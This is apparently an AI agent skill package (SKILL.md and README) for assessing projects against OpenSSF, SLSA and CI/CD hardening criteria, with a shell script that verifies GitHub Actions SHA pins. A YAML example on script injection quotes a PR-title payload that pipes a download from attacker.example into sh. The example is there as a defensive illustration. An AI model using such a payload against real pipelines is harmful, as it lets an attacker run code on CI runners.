enterprise-readiness
netresearch/enterprise-readiness-skill
Assess and enhance software projects for enterprise-grade security, quality, and automation. Use when evaluating projects for production readiness, implementing supply chain security (SLSA, signing, SBOMs), hardening CI/CD pipelines, or establishing quality gates. Aligned with OpenSSF Scorecard, Best Practices Badge (all levels), SLSA, and S2C2F. By Netresearch.
SKILL.md
---
name: enterprise-readiness
description: "Assess and enhance software projects for enterprise-grade security, quality, and automation. Use when evaluating projects for production readiness, implementing supply chain security (SLSA, signing, SBOMs), hardening CI/CD pipelines, or establishing quality gates. Aligned with OpenSSF Scorecard, Best Practices Badge (all levels), SLSA, and S2C2F. By Netresearch."
---
Enterprise Readiness Assessment
When to Use
- Evaluating projects for production/enterprise readiness
- Implementing supply chain security (SLSA, signing, SBOMs)
- Hardening CI/CD pipelines
- Establishing quality gates
- Pursuing OpenSSF Best Practices Badge (Passing/Silver/Gold)
Assessment Workflow
1. Discovery: Identify platform (GitHub/GitLab), languages, existing CI/CD
2. Scoring: Apply checklists from references based on stack
3. Badge Assessment: Check OpenSSF criteria status
4. Gap Analysis: List missing controls by severity
5. Implementation: Apply fixes using scripts and templates
Reference Files (Load Based on Stack)
| Reference | When to Load |
|---|---|
| references/general.md | Always (universal, 60 pts) |
| references/github.md | GitHub-hosted projects (40 pts) |
| references/go.md | Go projects (20 pts) |
| references/openssf-badge-silver.md | Pursuing Silver badge |
| references/openssf-badge-gold.md | Pursuing Gold badge |
Implementation Guides
| Guide | Purpose |
|---|---|
| references/quick-start-guide.md | Getting started |
| references/dco-implementation.md | DCO enforcement |
| references/signed-releases.md | Cosign/GPG signing |
| references/reproducible-builds.md | Deterministic builds |
| references/security-hardening.md | TLS, headers, validation |
| references/solo-maintainer-guide.md | N/A criteria justification |
| references/branch-coverage.md | Gold 80% branch coverage |
Automation Scripts
| Script | Purpose |
|---|---|
| scripts/verify-badge-criteria.sh | Verify OpenSSF badge criteria |
| scripts/check-coverage-threshold.sh | Statement coverage check |
| scripts/check-branch-coverage.sh | Branch coverage (Gold) |
| scripts/add-spdx-headers.sh | Add SPDX headers (Gold) |
| scripts/verify-signed-tags.sh | Tag signature verification |
| scripts/verify-review-requirements.sh | PR review requirements |
Document Templates
Templates in assets/templates/:
- GOVERNANCE.md - Project governance (Silver)
- ARCHITECTURE.md - Technical docs (Silver)
- CODE_OF_CONDUCT.md - Contributor Covenant
- SECURITY_AUDIT.md - Security audit (Gold)
- BADGE_EXCEPTIONS.md - N/A justifications
CI Workflow Templates
GitHub Actions workflows in assets/workflows/:
| Workflow | Purpose |
|---|---|
| scorecard.yml | OpenSSF Scorecard security analysis |
| codeql.yml | Semantic code security scanning |
| dependency-review.yml | PR dependency CVE/license check |
| slsa-provenance.yml | SLSA Level 3 build attestation |
| dco-check.yml | Developer Certificate of Origin |
Copy the workflows to .github/workflows/ and, before enabling them, pin every action to a full commit SHA, keeping the tag the SHA was resolved from in a trailing comment (uses: owner/repo@<sha> # vX.Y.Z) so the pin stays reviewable and can be bumped by dependency tooling.
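The pin check that belongs with that step, as an added example rather than one of the skill's own scripts: a POSIX shell script that reads each `uses:` step of a workflow, requires a full 40-hex commit pin with a trailing version comment, and compares the pin against the commit that tag resolves to upstream via `git ls-remote`. The function names (`parse_uses_line`, `tag_commit_sha`, `compare_pin`, `verify_workflow`) are this example's own, and the repository name, SHAs and tags in its offline self-check are constructed placeholders, not real projects.

```shell
#!/usr/bin/env sh
# Added example, not part of the skill: verify that each SHA-pinned `uses:`
# step in a GitHub Actions workflow points at the commit behind the tag named
# in its trailing comment, i.e. lines shaped like
#   uses: owner/repo@<40-hex-sha> # v1.2.3
# Needs only git; the online lookup is `git ls-remote` against github.com.
# All repo names, SHAs and tags in the self-check are constructed placeholders.

# Parse one `uses:` line. Prints "<owner/repo> <sha> <tag>" and returns 0.
# Returns 1 if the step is not pinned to a full 40-hex commit SHA or has no
# version comment; returns 2 for local (./) and docker:// actions, which have
# no upstream tag to compare against.
parse_uses_line() {
  rest=$(printf '%s' "$1" | sed -E 's/^[[:space:]]*-?[[:space:]]*uses:[[:space:]]*//')
  ref=$(printf '%s' "${rest%%#*}" | sed -E 's/[[:space:]]+$//')
  comment=$(printf '%s' "${rest#"$ref"}" | sed -E 's/^[[:space:]]*#[[:space:]]*//')
  case "$ref" in ./*|docker://*) return 2 ;; esac
  repo=$(printf '%s' "${ref%@*}" | cut -d/ -f1,2)   # drop any sub-path (owner/repo/dir)
  sha=${ref##*@}
  printf '%s' "$sha" | grep -Eq '^[0-9a-f]{40}$' || return 1
  tag=${comment%% *}
  [ -n "$tag" ] || return 1
  printf '%s %s %s\n' "$repo" "$sha" "$tag"
}

# Resolve a tag to a commit from `git ls-remote --tags` output. An annotated
# tag is listed twice: "<tag object> refs/tags/v1" and "<commit> refs/tags/v1^{}".
# A pin must equal the commit, so prefer the peeled ^{} entry and fall back to
# the plain entry (lightweight tag). $1 = ls-remote output, $2 = tag name.
tag_commit_sha() {
  for r in "refs/tags/$2^{}" "refs/tags/$2"; do
    found=$(printf '%s\n' "$1" | awk -v r="$r" '$2 == r { print $1; exit }')
    if [ -n "$found" ]; then printf '%s\n' "$found"; return 0; fi
  done
  return 1
}

# Compare a pin with the tag's commit; 0 on match, 1 otherwise.
# $1 owner/repo, $2 pinned sha, $3 tag, $4 ls-remote output.
compare_pin() {
  if ! expected=$(tag_commit_sha "$4" "$3"); then
    echo "FAIL $1: tag $3 not found upstream"; return 1
  fi
  if [ "$expected" = "$2" ]; then
    echo "OK   $1@$2 ($3)"
  else
    echo "FAIL $1: pinned $2 but $3 resolves to $expected"; return 1
  fi
}

# Online check of one pin against github.com.
verify_pin() {
  remote=$(git ls-remote --tags "https://github.com/$1" "refs/tags/$3") || return 1
  compare_pin "$1" "$2" "$3" "$remote"
}

# Check every `uses:` step in a workflow file; the return value is the number
# of failing steps (0 means every pin matched its tag).
verify_workflow() {
  fails=0; tmp=$(mktemp)
  grep -E '^[[:space:]]*-?[[:space:]]*uses:' "$1" > "$tmp" || true
  while IFS= read -r line; do
    if parsed=$(parse_uses_line "$line"); then
      p_rest=${parsed#* }
      verify_pin "${parsed%% *}" "${p_rest%% *}" "${p_rest#* }" || fails=$((fails + 1))
    elif [ $? -eq 1 ]; then
      echo "FAIL unpinned or uncommented step: $line"; fails=$((fails + 1))
    fi
  done < "$tmp"
  rm -f "$tmp"
  return "$fails"
}

if [ $# -gt 0 ]; then   # usage: sh verify-pins.sh .github/workflows/*.yml
  rc=0; for f in "$@"; do verify_workflow "$f" || rc=1; done; exit "$rc"
fi

# Offline self-check on constructed data: an annotated tag whose tag-object
# SHA (aaaa...) differs from the commit it points at (0123...).
sample_remote=$(printf '%s\t%s\n%s\t%s\n' \
  aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa refs/tags/v1.2.3 \
  0123456789abcdef0123456789abcdef01234567 'refs/tags/v1.2.3^{}')
compare_pin example-org/example-action 0123456789abcdef0123456789abcdef01234567 v1.2.3 "$sample_remote"
# The classic mistake: pinning the tag object instead of the commit it points to.
compare_pin example-org/example-action aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa v1.2.3 "$sample_remote" || true
```

The annotated-tag case is the one worth remembering: `git ls-remote` prints the tag object's SHA on the plain `refs/tags/vX` line, and GitHub's UI shows the same object SHA on the tag page, but a workflow pin must be the peeled commit (`refs/tags/vX^{}`), otherwise the step fails to resolve. The check only proves that pin and tag agree at the moment it runs; the pin, not the comment, is what the runner trusts, so a moved or deleted tag upstream does not change what executes.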
Scoring Interpretation
| Score | Grade | Status |
|---|---|---|
| 90-100 | A | Enterprise Ready |
| 80-89 | B | Production Ready |
| 70-79 | C | Development Ready |
| 60-69 | D | Basic |
| <60 | F | Not Ready |
Critical Rules
- NEVER interpolate `${{ github.event.* }}` (or other attacker-controlled context such as `github.head_ref`) directly into `run:` blocks; the expression is substituted into the script before the shell parses it, which is script injection. Pass such values through `env:` instead.
- NEVER guess action versions; always fetch them from the GitHub API
- ALWAYS pin actions to a full commit SHA, with the corresponding tag in a trailing version comment
- ALWAYS verify that the pinned commit hash matches the official tag
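Both rules in one workflow excerpt, as an added example that is not one of the skill's bundled workflows: the all-zeros SHA on `actions/checkout` is a placeholder standing in for a verified commit (it is not a real commit of that action), and the allowed title prefixes are an assumed policy for the sake of the demonstration.

```yaml
name: pr-title-check
on:
  pull_request:
    types: [opened, edited, synchronize]
permissions:
  contents: read          # least privilege: this job only reads the repository
jobs:
  check:
    runs-on: ubuntu-latest
    steps:
      # Pin to a full commit SHA and keep the tag it was resolved from in the
      # comment, so reviewers and Dependabot/Renovate can track the version.
      # (The all-zeros SHA is a placeholder, not a real actions/checkout commit.)
      - uses: actions/checkout@0000000000000000000000000000000000000000 # v4.1.1

      # UNSAFE (left commented out): the title is substituted into the script
      # text before the shell parses it, so a PR titled
      #   "; curl https://attacker.example/x | sh #
      # closes the quoted string and runs the attacker's command on the runner.
      # - run: echo "Checking PR title ${{ github.event.pull_request.title }}"

      # SAFE: hand untrusted event data to the step through an environment
      # variable; the shell then only ever sees it as the value of $PR_TITLE.
      - name: Check PR title
        env:
          PR_TITLE: ${{ github.event.pull_request.title }}
        run: |
          case "$PR_TITLE" in
            feat:*|fix:*|docs:*|chore:*) echo "title ok: $PR_TITLE" ;;
            *) echo "::error::PR title must start with feat:, fix:, docs: or chore:"; exit 1 ;;
          esac
```

The same pattern applies to any context value a contributor controls: issue and comment bodies, branch names (`github.head_ref`), commit messages and author fields. Quoting inside the `run:` script does not help, because the substitution happens before the script exists as shell text; only the `env:` indirection keeps the value out of the parser.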
Related Skills
| Skill | Purpose |
|---|---|
| go-development | Go code patterns, Makefile interface, testing |
| github-project | Repository setup, branch protection, auto-merge |
| security-audit | Deep security audits (OWASP, XXE, SQLi) |
| git-workflow | Git branching, commits, PR workflows |
Resources
Contributing: Improvements to this skill should be submitted to the source repository: https://github.com/netresearch/enterprise-readiness-skill
README
Enterprise Readiness Skill
Netresearch AI skill for assessing and enhancing software projects to meet enterprise-grade standards for security, quality, and automation.
🔌 Compatibility
This is an Agent Skill following the open standard originally developed by Anthropic and released for cross-platform use.
Supported Platforms:
- ✅ Claude Code (Anthropic)
- ✅ Cursor
- ✅ GitHub Copilot
- ✅ Other skills-compatible AI agents
Skills are portable packages of procedural knowledge that work across any AI agent supporting the Agent Skills specification.
Features
- OpenSSF Framework Alignment - Complete coverage across Scorecard, Best Practices Badge (Passing/Silver/Gold), SLSA, and S2C2F
- Dynamic Scoring - Fair cross-stack assessment with platform/language-specific criteria
- Supply Chain Security - SLSA provenance, artifact signing, SBOM generation, dependency scanning
- Quality Gates - Testing layers, coverage thresholds, static analysis, secret scanning
- Automation Scripts - Ready-to-use scripts for security hardening and compliance checks
- Badge Progression - Guided path from Passing → Silver → Gold certification
Installation
Option 1: Via Netresearch Marketplace (Recommended)
claude mcp add-json netresearch-skills-bundle '{"type":"url","url":"https://raw.githubusercontent.com/netresearch/claude-code-marketplace/main/.claude-plugin/marketplace.json"}'
Then browse skills with /plugin.
Option 2: Download Release
Download the latest release and extract to ~/.claude/skills/enterprise-readiness/
Option 3: Composer (PHP projects)
composer require netresearch/agent-enterprise-readiness
Requires: netresearch/composer-agent-skill-plugin
Usage
The skill triggers on keywords like:
- "enterprise readiness", "production ready"
- "OpenSSF", "security scorecard", "best practices badge"
- "SLSA", "supply chain security", "SBOM"
- "quality gates", "CI/CD hardening"
Example Prompts
"Assess this project for enterprise readiness"
"What's needed for OpenSSF Best Practices Silver badge?"
"Help me reach SLSA Level 2"
"Set up supply chain security for this Go project"
Structure
enterprise-readiness/
├── SKILL.md # AI instructions
├── README.md # This file
├── LICENSE # MIT license
├── composer.json # PHP distribution
├── references/ # OpenSSF criteria documentation
│ ├── general.md # Universal checks (60 points)
│ ├── github.md # GitHub-specific (40 points)
│ ├── go.md # Go-specific (20 points)
│ ├── openssf-badge-silver.md
│ └── openssf-badge-gold.md
├── scripts/ # Automation scripts
│ ├── check-*.sh # Validation scripts
│ └── setup-*.sh # Configuration scripts
└── assets/ # Templates and configs
└── templates/ # CI/CD, SBOM, policy templates
Contributing
Contributions welcome! Please submit PRs for:
- Additional platform support (GitLab, Bitbucket)
- New language-specific checks
- Script improvements
- Documentation updates
License
MIT License - See LICENSE for details.
Credits
Developed and maintained by Netresearch DTT GmbH.
Made with ❤️ for Open Source by Netresearch